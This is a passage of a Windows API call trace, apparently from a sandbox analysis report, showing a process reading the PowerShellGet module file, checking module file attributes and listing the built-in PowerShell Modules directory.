[0088.458] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x78000 [0088.458] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, 
nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.458] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x79000 [0088.458] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.459] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x7a000 [0088.459] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.459] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x7b000 [0088.460] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.460] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x7c000 [0088.460] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.460] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x7d000 [0088.460] ReadFile (in: 
hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.461] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x7e000 [0088.461] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.462] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x7f000 [0088.462] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.462] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x80000 [0088.462] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.464] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x81000 [0088.465] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.465] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x82000 
[0088.465] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.465] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x83000 [0088.465] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.465] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x84000 [0088.465] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.466] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x85000 [0088.466] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.466] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x86000 [0088.466] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.467] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: 
lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x87000 [0088.467] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.467] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x88000 [0088.467] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.468] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x89000 [0088.468] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.468] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x8a000 [0088.468] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.469] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x8b000 [0088.469] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.469] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x8c000 [0088.469] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0xaa9, lpOverlapped=0x0) returned 1 [0088.469] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x8caa9 [0088.469] ReadFile (in: hFile=0x468, lpBuffer=0x6c1f6c1, nNumberOfBytesToRead=0x157, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c1f6c1*, lpNumberOfBytesRead=0x4ebd8ec*=0x0, lpOverlapped=0x0) returned 1 [0088.469] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x8caa9 [0088.469] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x0, lpOverlapped=0x0) returned 1 [0088.488] CloseHandle (hObject=0x468) returned 1 [0089.100] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4f [0089.100] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1", nBufferLength=0x4f, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1", lpFilePart=0x0) returned 0x4e [0089.100] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebd644) returned 1 [0089.100] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1" (normalized: "c:\\program 
files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psmodule.psm1"), fInfoLevelId=0x0, lpFileInformation=0x67c1b50 | out: lpFileInformation=0x67c1b50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24e634a0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x1c7d2120, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x1c7d2120, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x8caa9)) returned 1 [0089.100] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebd640) returned 1 [0089.115] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0089.115] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x54, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0089.115] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe43c) returned 1 [0089.115] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), fInfoLevelId=0x0, lpFileInformation=0x67e6088 | out: lpFileInformation=0x67e6088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24e3d340, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x1c7d2120, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x1c7d2120, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x10de)) returned 1 [0089.115] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe438) returned 1 [0089.128] EtwEventActivityIdControl () returned 0x0 
[0089.130] SetEvent (hEvent=0x4d4) returned 1 [0089.130] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x4ebec1c*=0x4d4, lpdwindex=0x4ebea40 | out: lpdwindex=0x4ebea40) returned 0x0 [0089.131] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0089.131] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x54, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0089.131] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeafc) returned 1 [0089.131] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), fInfoLevelId=0x0, lpFileInformation=0x67e9098 | out: lpFileInformation=0x67e9098*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24e3d340, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x1c7d2120, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x1c7d2120, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x10de)) returned 1 [0089.132] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeaf8) returned 1 [0089.132] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.psd1")) returned 0xffffffff [0089.132] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psm1" (normalized: "c:\\program 
files\\windowspowershell\\modules\\powershellget\\powershellget.psm1")) returned 0xffffffff [0089.132] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.cdxml")) returned 0xffffffff [0089.132] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.xaml")) returned 0xffffffff [0089.132] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.ni.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.ni.dll")) returned 0xffffffff [0089.132] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.dll")) returned 0xffffffff [0089.136] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules")) returned 0x10 [0089.137] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebee0c) returned 1 [0089.137] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x33 [0089.137] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x33, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0089.137] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\*", lpFindFileData=0x4ebebbc | out: lpFindFileData=0x4ebebbc*(dwFileAttributes=0x10, 
ftCreationTime.dwLowDateTime=0xe4f50ebe, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x24d0c840, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24d0c840, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x34d440 [0089.137] FindNextFileW (in: hFindFile=0x34d440, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4f50ebe, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x24d0c840, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24d0c840, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.137] FindNextFileW (in: hFindFile=0x34d440, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xca1d0904, ftCreationTime.dwHighDateTime=0x1cbf8b8, ftLastAccessTime.dwLowDateTime=0xd9467d5c, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xca1d0904, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker", cAlternateFileName="APPLOC~1")) returned 1 [0089.137] FindNextFileW (in: hFindFile=0x34d440, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xe4f50ebe, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x919bae56, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x919bae56, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer", cAlternateFileName="BITSTR~1")) returned 1 [0089.138] FindNextFileW (in: hFindFile=0x34d440, 
lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24b8fa80, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24b8fa80, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24b8fa80, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets", cAlternateFileName="CIMCMD~1")) returned 1 [0089.138] FindNextFileW (in: hFindFile=0x34d440, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24b8fa80, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24bb5be0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24bb5be0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ISE", cAlternateFileName="")) returned 1 [0089.138] FindNextFileW (in: hFindFile=0x34d440, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24b1d660, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24b437c0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24b437c0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive", cAlternateFileName="MICROS~1.ARC")) returned 1 [0089.138] FindNextFileW (in: hFindFile=0x34d440, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24b8fa80, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24b8fa80, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24b8fa80, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, 
cFileName="Microsoft.PowerShell.Diagnostics", cAlternateFileName="MICROS~1.DIA")) returned 1 [0089.138] FindNextFileW (in: hFindFile=0x34d440, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24b8fa80, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24b8fa80, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24b8fa80, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Host", cAlternateFileName="MICROS~1.HOS")) returned 1 [0089.138] FindNextFileW (in: hFindFile=0x34d440, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24b437c0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24b437c0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24b437c0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.LocalAccounts", cAlternateFileName="MICROS~1.LOC")) returned 1 [0089.138] FindNextFileW (in: hFindFile=0x34d440, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24b8fa80, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24b8fa80, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24b8fa80, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management", cAlternateFileName="MICROS~1.MAN")) returned 1 [0089.138] FindNextFileW (in: hFindFile=0x34d440, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24b437c0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24b437c0, 
ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24b437c0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils", cAlternateFileName="MICROS~1.ODA")) returned 1 [0089.138] FindNextFileW (in: hFindFile=0x34d440, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24ce66e0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24ce66e0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24ce66e0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Security", cAlternateFileName="MICROS~1.SEC")) returned 1 [0089.138] FindNextFileW (in: hFindFile=0x34d440, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24bb5be0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24bb5be0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24bb5be0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility", cAlternateFileName="MICROS~1.UTI")) returned 1 [0089.138] FindNextFileW (in: hFindFile=0x34d440, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24ce66e0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24d0c840, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24d0c840, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.WSMan.Management", cAlternateFileName="MICROS~2.MAN")) returned 1 [0089.138] FindNextFileW (in: hFindFile=0x34d440, lpFindFileData=0x4ebebc4 